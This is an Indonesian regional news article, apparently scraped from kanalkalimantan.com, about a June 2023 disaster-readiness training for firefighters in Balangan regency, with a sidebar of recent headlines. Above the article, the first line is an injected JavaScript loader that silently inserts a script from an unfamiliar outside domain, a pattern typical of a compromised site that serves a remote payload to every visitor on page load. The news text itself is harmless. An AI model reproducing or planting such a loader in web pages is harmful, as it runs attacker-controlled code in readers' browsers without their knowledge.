(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Damkar Balangan Dilatih Peningkatan Pengetahuan Kebencanaan


KANALKALIMANTAN.COM, PARINGIN – BPBD Kabupaten Balangan gelar pelatihan peningkatan kapasitas personel pemadam kebakaran (Damkar) se Kabupaten Balangan tahun 2023 selama dua hari, 3-4 Juni 2023.

Kepala Pelaksana BPBD Balangan H Rahmi mengatakan, selama dua hari tersebut personel Damkar diberikan pembekalan tentang materi seputar kebakaran, mulai dari langkah awal, penanganan serta pasca bencana.

Personel Damkar ini sangat berperan dalam menanggulangi musibah kebakaran baik permukiman atau Karhutla, karena keberadaan Damkar harus selalu standby di tempat masing-masing.

“BPBD Balangan selalu berkoodinasi dengan personel Damkar jika terjadi kebakaran, mereka sangat berperan andil untuk bisa cepat sampai ke lokasi kebakaran, agar penanganan lebih maksimal maka diperlukan bimbingan teknis pelatihan ini,” ujarnya, Minggu (4/6/2023).

Baca juga :Kabar Gembira, Sekda se Kalsel Bersepakat Tenaga Honorer Tidak Diberhentikan

Menurutnya, tujuan penyelenggaraan kegiatan ini adalah untuk menjamin kesiapan personel pemadam kebakaran di Kabupaten Balangan.

Beberapa materi yang diberikan di antaranya pedoman, standar dan prosedur teknis penanggulangan kebakaran, kemudian pengenalan dan perawatan alat pemadam kebakaran.

“Praktek lapangan simulasi skenario penanggulangan kebakaran dan penyelamatan kepada korban,” katanya.

Tugas pokok dan fungsi (Tupoksi) Damkar yakni pencegahan dan pengendalian kebakaran, pemadaman kebakaran, penyelamatan, pemberdayaan masyarakat, serta penanganan bahan berbahaya dan beracun.

Baca juga: Wabup Banjar Hadiri Haul Ke-67 Tuan Guru H Zainal Ilmi

Damkar juga mempunyai kewenangan terkait pencegahan, pengendalian, pemadaman, penyelamatan dan penanganan, inspeksi peralatan proteksi kebakaran, investigasi kejadian kebakaran dan pemberdayaan masyarakat dalam pencegahan kebakaran.

“Kami mengharapkan dengan adanya bimtek ini lebih mempertajam dan memperkuat posisi BPBD Balangan bersama Damkar dalam upaya penanganan kebencanaan,” pungkasnya. (Kanalkalimantan.com/mcbalangan/adv)

Reporter: adv
Editor: kk


Al Ghifari

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

8 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

9 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

9 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

9 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

9 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

10 jam ago

This website uses cookies.